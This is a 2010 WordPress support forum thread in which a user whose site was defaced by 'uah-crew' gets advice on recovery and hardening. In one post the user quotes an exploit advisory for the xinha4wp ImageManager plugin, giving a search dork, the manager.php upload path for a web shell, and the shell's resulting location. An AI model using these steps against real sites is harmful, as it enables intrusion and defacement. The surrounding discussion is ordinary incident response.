Wordpress Themes - WP Forum at BFA

Wordpress Themes - WP Forum at BFA (http://forum.bytesforall.com/index.php)
-   New Versions, & Updating (http://forum.bytesforall.com/forumdisplay.php?f=12)
-   -   My site has been hacked - atahualpa 3.4.6 (http://forum.bytesforall.com/showthread.php?t=7593)

Mikii Jun 15, 2010 07:38 AM

My site has been hacked - atahualpa 3.4.6
 
hi.

My wordpress' website was just hacked. I strongly suspect Atahualpa, because re-downloading and re-installing it (version 3.4.6) solved the problem.

Any page of the website showed this crew signature: "uah-crew".

The "hacked" 3.4.6 version is available for reviewing. Just PM or email me and I'll send it to you.

Thanks for the attention.

Michele

juggledad Jun 15, 2010 08:16 AM

I would suspect it is your wordpress and/or server that was hacked.
Who is your host?
contact them and tell them you have been hacked.

What version of WordPress are you running?
use FTP and go look at the dates on all your other themes and all other wordpress files and see if there are any with a date that doesn't match the others.
Change your wordpress admin password
check all users in wordpress
cange your ftp passwotd
look to see if there are any other FTP users you don't know
change your cpanel/host password, check to see if there are any others you don't recognize
scan your wordpress database for any potential sql injections

do a google search on 'wordpress hacked' and follow the directions

This is not a fun thing to have happen or easy thing to have fixed. Hundreds of wordpress sites were hacked into a couple months ago at bluehost and it was a server security issue.

good luck recovering

Mikii Jun 15, 2010 08:49 AM

Dear juggledad,

All I can say is that public_html/wp-content/themes/atahualpa/index.php had been re-written. I am still investigating how. WP is 2.9.2.

The original directory has already been replaced on server, and re-installing Atahualpa solved the problem.

Thanks for your suggestions, please feel free to change the subject of this post if you feel it's not an atahualpa "hole".

Will keep you posted.

juggledad Jun 15, 2010 09:38 AM

You have wordpress installed in 'public_html'???? how secure is it?
who is the host?
what is the url?

Mikii Jun 15, 2010 09:50 AM

url is www.tendertonaveitalia.net

host is hostingplan.net / Cpanel / linux

pardon my ignorance, what is wrong with putting wordpress on your root home directory?

Tnx.

juggledad Jun 15, 2010 09:51 AM

when I see 'public' in a folder name, alarms go off. Now it might be quite secure, but I'd check it out. It's just me being nervous.

Have you contacted the host to see if anyone else was hacked?

Mikii Jun 15, 2010 10:16 AM

Quote:

Originally Posted by juggledad (Post 34447)
when I see 'public' in a folder name, alarms go off. Now it might be quite secure, but I'd check it out. It's just me being nervous.

Have you contacted the host to see if anyone else was hacked?

I see. "public html" is just an alias to "www". It's the place where all the "web" stuff go.

Yes I did contact my host. hopefully They'll find out how the hacker got his hands on the index.php.

Thanks you for your feedbacks. Cheers!

DannyLife Jun 15, 2010 11:09 AM

I had a site get hacked not too long ago with exactly the same method. It wasn't anything to do with the theme, apparently they got in through a plug-in that I hadn't updated. So check and make sure they're all up to the current version.

Mikii Jun 15, 2010 11:32 AM

Quote:

Originally Posted by DannyLife (Post 34457)
I had a site get hacked not too long ago with exactly the same method. It wasn't anything to do with the theme, apparently they got in through a plug-in that I hadn't updated. So check and make sure they're all up to the current version.

yes, I found this via google. Only: I do not have ImageManager installed. Was this your plugin?

------
================================================== =============
Wordpress xinha4wp xinha_core plugins File Upload Vulnerability
================================================== =============

################################################## ##################

Author : Hackeri-AL
Contact : hackeri-al[at]live[dot]com
Greetz : LoocK3D & all Albania and Kosova Hackers
My Group : UAH-Crew = United Albania Hackers

################################################## ##################

[~] DORK: /imagemanager/demo_images/wp/ site: com ,de , org / etc...

--------------------------------------------------------------------

[~] You go to: htpp://web.com/wp-content/plugins/xinha4wp/xinha_core/plugins/ImageManager/
[~] Then we : htpp://web.com/wp-content/plugins/xinha4wp/xinha_core/plugins/ImageManager/manager.php <[ upload here shell ]
[~] Shell : htpp://web.com/wp-content/plugins/xinha4wp/xinha_core/plugins/ImageManager/demo_images/yourShell.php

################################################## ##################

[~] Video: http://www.youtube.com/watch?v=BG-OVjG8dcs

################################################## ##################

[~] Proud 2 be Albania
[~] Proud 2 be Muslim
[~] United States of Albania

################################################## ##################


# Inj3ct0r.com [2010-04-16]

------

DannyLife Jun 15, 2010 11:58 AM

Sorry, I never got to see the details. My host dealt with it and informed me that I needed to update the plug-ins. I wasn't using ImageManager either though.

Mikii Jun 15, 2010 12:15 PM

I see. Thanks. All my plugins are updated now. Hope my host will be able to tell me what the problem was.

Knut Sparhell Jun 17, 2010 09:09 PM

Quote:

Originally Posted by juggledad (Post 34447)
when I see 'public' in a folder name, alarms go off. Now it might be quite secure, but I'd check it out. It's just me being nervous.

The public_html alias www is the standard (By Linux based Web Hosts) naming of the user folder that will serve as the root folder for the web site. Similar to public_ftp for you ftp site. It's just a name. It doesn't imply it initially has write access for everyone.


All times are GMT -6. The time now is 09:32 AM.

Powered by vBulletin® Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.